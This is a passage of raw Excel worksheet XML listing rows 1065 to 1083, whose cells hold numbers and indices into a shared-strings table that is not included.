        <v>7938</v>
      </c>
      <c r="Q1065" s="12">
        <v>2.4</v>
      </c>
      <c r="R1065" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1065" s="12" t="s">
        <v>7939</v>
      </c>
      <c r="T1065" s="12" t="s">
        <v>7940</v>
      </c>
      <c r="U1065" s="12" t="s">
        <v>7941</v>
      </c>
      <c r="V1065" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W1065" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1065" s="12">
        <v>9</v>
      </c>
      <c r="Y1065" s="12" t="s">
        <v>7942</v>
      </c>
    </row>
    <row r="1066" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1066" s="12">
        <v>5626</v>
      </c>
      <c r="B1066" s="12" t="s">
        <v>29289</v>
      </c>
      <c r="C1066" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D1066" s="12" t="s">
        <v>29285</v>
      </c>
      <c r="F1066" s="12" t="s">
        <v>29290</v>
      </c>
      <c r="G1066" s="12" t="s">
        <v>7944</v>
      </c>
      <c r="H1066" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1066" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1066" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K1066" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1066" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1066" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1066" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1066" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1066" s="12" t="s">
        <v>7841</v>
      </c>
      <c r="Q1066" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1066" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1066" s="12" t="s">
        <v>7945</v>
      </c>
      <c r="T1066" s="12" t="s">
        <v>7946</v>
      </c>
      <c r="U1066" s="12" t="s">
        <v>7947</v>
      </c>
      <c r="V1066" s="12" t="s">
        <v>4773</v>
      </c>
      <c r="W1066" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1066" s="12">
        <v>6</v>
      </c>
      <c r="Y1066" s="12" t="s">
        <v>7948</v>
      </c>
    </row>
    <row r="1067" spans="1:25" ht="18" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1067" s="12">
        <v>5628</v>
      </c>
      <c r="B1067" s="12" t="s">
        <v>29291</v>
      </c>
      <c r="D1067" s="12" t="s">
        <v>29292</v>
      </c>
      <c r="E1067" s="12" t="s">
        <v>31475</v>
      </c>
      <c r="F1067" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1067" s="12" t="s">
        <v>7949</v>
      </c>
      <c r="H1067" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1067" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1067" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K1067" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1067" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1067" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1067" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1067" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1067" s="12" t="s">
        <v>7914</v>
      </c>
      <c r="Q1067" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1067" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1067" s="12" t="s">
        <v>7950</v>
      </c>
      <c r="T1067" s="12" t="s">
        <v>4675</v>
      </c>
      <c r="U1067" s="12" t="s">
        <v>7951</v>
      </c>
      <c r="V1067" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W1067" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1067" s="12">
        <v>23</v>
      </c>
      <c r="Y1067" s="12" t="s">
        <v>7952</v>
      </c>
    </row>
    <row r="1068" spans="1:25" ht="18.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1068" s="12">
        <v>5651</v>
      </c>
      <c r="B1068" s="12" t="s">
        <v>31325</v>
      </c>
      <c r="C1068" s="12" t="s">
        <v>31395</v>
      </c>
      <c r="D1068" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E1068" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F1068" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G1068" s="12" t="s">
        <v>7959</v>
      </c>
      <c r="H1068" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1068" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1068" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K1068" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1068" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1068" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1068" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1068" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1068" s="12">
        <v>2.6</v>
      </c>
      <c r="Q1068" s="12">
        <v>2.6</v>
      </c>
      <c r="R1068" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1068" s="12" t="s">
        <v>7960</v>
      </c>
      <c r="T1068" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U1068" s="12" t="s">
        <v>7779</v>
      </c>
      <c r="V1068" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W1068" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1068" s="12">
        <v>3</v>
      </c>
      <c r="Y1068" s="12" t="s">
        <v>7961</v>
      </c>
    </row>
    <row r="1069" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1069" s="12">
        <v>5660</v>
      </c>
      <c r="B1069" s="12" t="s">
        <v>29293</v>
      </c>
      <c r="D1069" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1069" s="12" t="s">
        <v>29294</v>
      </c>
      <c r="G1069" s="12" t="s">
        <v>7967</v>
      </c>
      <c r="H1069" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1069" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1069" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K1069" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1069" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1069" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1069" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1069" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1069" s="12" t="s">
        <v>7968</v>
      </c>
      <c r="Q1069" s="12" t="s">
        <v>28292</v>
      </c>
      <c r="R1069" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1069" s="12" t="s">
        <v>7969</v>
      </c>
      <c r="T1069" s="12" t="s">
        <v>7970</v>
      </c>
      <c r="U1069" s="12" t="s">
        <v>7971</v>
      </c>
      <c r="V1069" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W1069" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1069" s="12">
        <v>3</v>
      </c>
      <c r="Y1069" s="12" t="s">
        <v>7972</v>
      </c>
    </row>
    <row r="1070" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1070" s="12">
        <v>5674</v>
      </c>
      <c r="B1070" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1070" s="12" t="s">
        <v>29295</v>
      </c>
      <c r="D1070" s="12" t="s">
        <v>29296</v>
      </c>
      <c r="F1070" s="12" t="s">
        <v>29297</v>
      </c>
      <c r="G1070" s="12" t="s">
        <v>7980</v>
      </c>
      <c r="H1070" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1070" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1070" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1070" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1070" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M1070" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N1070" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O1070" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1070" s="12" t="s">
        <v>7979</v>
      </c>
      <c r="Q1070" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1070" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1070" s="12" t="s">
        <v>7981</v>
      </c>
      <c r="T1070" s="12" t="s">
        <v>7982</v>
      </c>
      <c r="U1070" s="12" t="s">
        <v>7983</v>
      </c>
      <c r="V1070" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W1070" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1070" s="12">
        <v>10</v>
      </c>
      <c r="Y1070" s="12" t="s">
        <v>7984</v>
      </c>
    </row>
    <row r="1071" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1071" s="12">
        <v>5677</v>
      </c>
      <c r="B1071" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1071" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1071" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1071" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1071" s="12" t="s">
        <v>7985</v>
      </c>
      <c r="H1071" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1071" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1071" s="12" t="s">
        <v>403</v>
      </c>
      <c r="K1071" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1071" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1071" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1071" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1071" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1071" s="12" t="s">
        <v>7303</v>
      </c>
      <c r="Q1071" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R1071" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1071" s="12" t="s">
        <v>7986</v>
      </c>
      <c r="T1071" s="12" t="s">
        <v>7987</v>
      </c>
      <c r="U1071" s="12" t="s">
        <v>7988</v>
      </c>
      <c r="V1071" s="12" t="s">
        <v>411</v>
      </c>
      <c r="W1071" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1071" s="12">
        <v>16</v>
      </c>
      <c r="Y1071" s="12" t="s">
        <v>7989</v>
      </c>
    </row>
    <row r="1072" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1072" s="12">
        <v>5681</v>
      </c>
      <c r="B1072" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1072" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1072" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1072" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1072" s="12" t="s">
        <v>7990</v>
      </c>
      <c r="H1072" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1072" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1072" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1072" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1072" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1072" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1072" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1072" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1072" s="12" t="s">
        <v>7991</v>
      </c>
      <c r="Q1072" s="12" t="s">
        <v>28328</v>
      </c>
      <c r="R1072" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1072" s="12" t="s">
        <v>7992</v>
      </c>
      <c r="T1072" s="12" t="s">
        <v>5309</v>
      </c>
      <c r="U1072" s="12" t="s">
        <v>7993</v>
      </c>
      <c r="V1072" s="12" t="s">
        <v>4483</v>
      </c>
      <c r="W1072" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1072" s="12">
        <v>4</v>
      </c>
      <c r="Y1072" s="12" t="s">
        <v>7994</v>
      </c>
    </row>
    <row r="1073" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1073" s="12">
        <v>5683</v>
      </c>
      <c r="B1073" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1073" s="12" t="s">
        <v>29298</v>
      </c>
      <c r="E1073" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1073" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1073" s="12" t="s">
        <v>7995</v>
      </c>
      <c r="H1073" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1073" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1073" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K1073" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1073" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1073" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1073" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1073" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1073" s="12" t="s">
        <v>7979</v>
      </c>
      <c r="Q1073" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1073" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1073" s="12" t="s">
        <v>7996</v>
      </c>
      <c r="T1073" s="12" t="s">
        <v>7997</v>
      </c>
      <c r="U1073" s="12" t="s">
        <v>7998</v>
      </c>
      <c r="V1073" s="12" t="s">
        <v>1923</v>
      </c>
      <c r="W1073" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1073" s="12">
        <v>8</v>
      </c>
      <c r="Y1073" s="12" t="s">
        <v>7999</v>
      </c>
    </row>
    <row r="1074" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1074" s="12">
        <v>5711</v>
      </c>
      <c r="B1074" s="12" t="s">
        <v>28341</v>
      </c>
      <c r="C1074" s="12" t="s">
        <v>28343</v>
      </c>
      <c r="D1074" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1074" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1074" s="12" t="s">
        <v>29744</v>
      </c>
      <c r="G1074" s="12" t="s">
        <v>8007</v>
      </c>
      <c r="H1074" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1074" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1074" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1074" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1074" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1074" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1074" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1074" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1074" s="12" t="s">
        <v>8008</v>
      </c>
      <c r="Q1074" s="12" t="s">
        <v>28328</v>
      </c>
      <c r="R1074" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1074" s="12" t="s">
        <v>8009</v>
      </c>
      <c r="T1074" s="12" t="s">
        <v>8010</v>
      </c>
      <c r="U1074" s="12" t="s">
        <v>8011</v>
      </c>
      <c r="V1074" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1074" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1074" s="12">
        <v>5</v>
      </c>
      <c r="Y1074" s="12" t="s">
        <v>8012</v>
      </c>
    </row>
    <row r="1075" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1075" s="12">
        <v>5729</v>
      </c>
      <c r="B1075" s="12" t="s">
        <v>29299</v>
      </c>
      <c r="D1075" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1075" s="12" t="s">
        <v>29296</v>
      </c>
      <c r="G1075" s="12" t="s">
        <v>8018</v>
      </c>
      <c r="H1075" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1075" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1075" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K1075" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1075" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1075" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1075" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1075" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1075" s="12" t="s">
        <v>8019</v>
      </c>
      <c r="Q1075" s="12">
        <v>2.6</v>
      </c>
      <c r="R1075" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1075" s="12" t="s">
        <v>8020</v>
      </c>
      <c r="T1075" s="12" t="s">
        <v>8021</v>
      </c>
      <c r="U1075" s="12" t="s">
        <v>8022</v>
      </c>
      <c r="V1075" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W1075" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1075" s="12">
        <v>2</v>
      </c>
      <c r="Y1075" s="12" t="s">
        <v>8023</v>
      </c>
    </row>
    <row r="1076" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1076" s="12">
        <v>5733</v>
      </c>
      <c r="B1076" s="12" t="s">
        <v>29293</v>
      </c>
      <c r="D1076" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1076" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1076" s="12" t="s">
        <v>29296</v>
      </c>
      <c r="G1076" s="12" t="s">
        <v>8024</v>
      </c>
      <c r="H1076" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1076" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1076" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K1076" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1076" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1076" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1076" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1076" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1076" s="12" t="s">
        <v>8025</v>
      </c>
      <c r="Q1076" s="12" t="s">
        <v>28294</v>
      </c>
      <c r="R1076" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1076" s="12" t="s">
        <v>8026</v>
      </c>
      <c r="T1076" s="12" t="s">
        <v>8027</v>
      </c>
      <c r="U1076" s="12" t="s">
        <v>8028</v>
      </c>
      <c r="V1076" s="12" t="s">
        <v>3984</v>
      </c>
      <c r="W1076" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1076" s="12">
        <v>9</v>
      </c>
      <c r="Y1076" s="12" t="s">
        <v>8029</v>
      </c>
    </row>
    <row r="1077" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1077" s="12">
        <v>5739</v>
      </c>
      <c r="B1077" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1077" s="12" t="s">
        <v>29300</v>
      </c>
      <c r="E1077" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1077" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1077" s="12" t="s">
        <v>8034</v>
      </c>
      <c r="H1077" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1077" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1077" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1077" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1077" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M1077" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1077" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1077" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1077" s="12" t="s">
        <v>7914</v>
      </c>
      <c r="Q1077" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1077" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1077" s="12" t="s">
        <v>8035</v>
      </c>
      <c r="T1077" s="12" t="s">
        <v>8036</v>
      </c>
      <c r="U1077" s="12" t="s">
        <v>8037</v>
      </c>
      <c r="V1077" s="12" t="s">
        <v>3800</v>
      </c>
      <c r="W1077" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1077" s="12">
        <v>3</v>
      </c>
      <c r="Y1077" s="12" t="s">
        <v>8038</v>
      </c>
    </row>
    <row r="1078" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1078" s="12">
        <v>5741</v>
      </c>
      <c r="B1078" s="12" t="s">
        <v>29293</v>
      </c>
      <c r="D1078" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1078" s="12" t="s">
        <v>29294</v>
      </c>
      <c r="G1078" s="12" t="s">
        <v>8039</v>
      </c>
      <c r="H1078" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1078" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1078" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K1078" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1078" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1078" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1078" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1078" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1078" s="12" t="s">
        <v>8040</v>
      </c>
      <c r="Q1078" s="12" t="s">
        <v>28328</v>
      </c>
      <c r="R1078" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1078" s="12" t="s">
        <v>8041</v>
      </c>
      <c r="T1078" s="12" t="s">
        <v>921</v>
      </c>
      <c r="U1078" s="12" t="s">
        <v>8042</v>
      </c>
      <c r="V1078" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W1078" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1078" s="12">
        <v>12</v>
      </c>
      <c r="Y1078" s="12" t="s">
        <v>8043</v>
      </c>
    </row>
    <row r="1079" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1079" s="12">
        <v>5747</v>
      </c>
      <c r="B1079" s="12" t="s">
        <v>29301</v>
      </c>
      <c r="D1079" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1079" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1079" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1079" s="12" t="s">
        <v>8044</v>
      </c>
      <c r="H1079" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1079" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1079" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K1079" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1079" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1079" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1079" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1079" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1079" s="12" t="s">
        <v>8045</v>
      </c>
      <c r="Q1079" s="12" t="s">
        <v>28328</v>
      </c>
      <c r="R1079" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1079" s="12" t="s">
        <v>8046</v>
      </c>
      <c r="T1079" s="12" t="s">
        <v>8047</v>
      </c>
      <c r="U1079" s="12" t="s">
        <v>8048</v>
      </c>
      <c r="V1079" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W1079" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1079" s="12">
        <v>5</v>
      </c>
      <c r="Y1079" s="12" t="s">
        <v>8049</v>
      </c>
    </row>
    <row r="1080" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1080" s="12">
        <v>5751</v>
      </c>
      <c r="B1080" s="12" t="s">
        <v>29302</v>
      </c>
      <c r="D1080" s="12" t="s">
        <v>29303</v>
      </c>
      <c r="F1080" s="12" t="s">
        <v>29296</v>
      </c>
      <c r="G1080" s="12" t="s">
        <v>8054</v>
      </c>
      <c r="H1080" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1080" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1080" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K1080" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1080" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1080" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1080" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1080" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1080" s="12" t="s">
        <v>7979</v>
      </c>
      <c r="Q1080" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1080" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1080" s="12" t="s">
        <v>8055</v>
      </c>
      <c r="T1080" s="12" t="s">
        <v>7898</v>
      </c>
      <c r="U1080" s="12" t="s">
        <v>8056</v>
      </c>
      <c r="V1080" s="12" t="s">
        <v>6918</v>
      </c>
      <c r="W1080" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1080" s="12">
        <v>7</v>
      </c>
      <c r="Y1080" s="12" t="s">
        <v>8057</v>
      </c>
    </row>
    <row r="1081" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1081" s="12">
        <v>5758</v>
      </c>
      <c r="B1081" s="12" t="s">
        <v>29304</v>
      </c>
      <c r="D1081" s="12" t="s">
        <v>29305</v>
      </c>
      <c r="E1081" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1081" s="12" t="s">
        <v>29296</v>
      </c>
      <c r="G1081" s="12" t="s">
        <v>8058</v>
      </c>
      <c r="H1081" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1081" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1081" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1081" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1081" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1081" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1081" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1081" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1081" s="12" t="s">
        <v>8059</v>
      </c>
      <c r="Q1081" s="12" t="s">
        <v>28328</v>
      </c>
      <c r="R1081" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1081" s="12" t="s">
        <v>8060</v>
      </c>
      <c r="T1081" s="12" t="s">
        <v>4646</v>
      </c>
      <c r="U1081" s="12" t="s">
        <v>8061</v>
      </c>
      <c r="V1081" s="12" t="s">
        <v>921</v>
      </c>
      <c r="W1081" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1081" s="12">
        <v>8</v>
      </c>
      <c r="Y1081" s="12" t="s">
        <v>8062</v>
      </c>
    </row>
    <row r="1082" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1082" s="12">
        <v>5760</v>
      </c>
      <c r="B1082" s="12" t="s">
        <v>29306</v>
      </c>
      <c r="D1082" s="12" t="s">
        <v>29307</v>
      </c>
      <c r="E1082" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1082" s="12" t="s">
        <v>29303</v>
      </c>
      <c r="G1082" s="12" t="s">
        <v>8063</v>
      </c>
      <c r="H1082" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1082" s="12" t="s">
        <v>5208</v>
      </c>
      <c r="J1082" s="12" t="s">
        <v>8064</v>
      </c>
      <c r="K1082" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1082" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1082" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1082" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1082" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1082" s="12" t="s">
        <v>8065</v>
      </c>
      <c r="Q1082" s="12" t="s">
        <v>28328</v>
      </c>
      <c r="R1082" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1082" s="12" t="s">
        <v>8066</v>
      </c>
      <c r="T1082" s="12" t="s">
        <v>4675</v>
      </c>
      <c r="U1082" s="12" t="s">
        <v>8067</v>
      </c>
      <c r="V1082" s="12" t="s">
        <v>5211</v>
      </c>
      <c r="W1082" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1082" s="12">
        <v>32</v>
      </c>
      <c r="Y1082" s="12" t="s">
        <v>8068</v>
      </c>
    </row>
    <row r="1083" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1083" s="12">
        <v>5775</v>
      </c>
      <c r="B1083" s="12" t="s">
        <v>29308</v>
      </c>
      <c r="C1083" s="12" t="s">
        <v>29309</v>
      </c>
      <c r="D1083" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1083" s="12" t="s">
        <v>29310</v>
      </c>
      <c r="G1083" s="12" t="s">
        <v>8073</v>
      </c>
      <c r="H1083" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1083" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1083" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K1083" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1083" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1083" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1083" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1083" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1083" s="12" t="s">
        <v>8074</v>
      </c>
      <c r="Q1083" s="12" t="s">
        <v>28295</v>
      </c>
      <c r="R1083" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1083" s="12" t="s">
        <v>8075</v>
      </c>
      <c r="T1083" s="12" t="s">
        <v>8076</v>
      </c>
      <c r="U1083" s="12" t="s">
        <v>8077</v>
      </c>
      <c r="V1083" s="12" t="s">
        <v>3984</v>
